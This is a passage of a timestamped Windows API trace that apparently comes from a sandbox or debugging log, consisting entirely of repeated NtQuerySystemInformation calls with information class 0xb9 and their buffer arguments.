(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x38, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0f0, Length=0x20, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0f0, Length=0x20, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f310, Length=0x40, ResultLength=0x0) [0238.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f310, Length=0x40, ResultLength=0x0) [0238.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f310, Length=0x40, ResultLength=0x0) [0238.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.600] 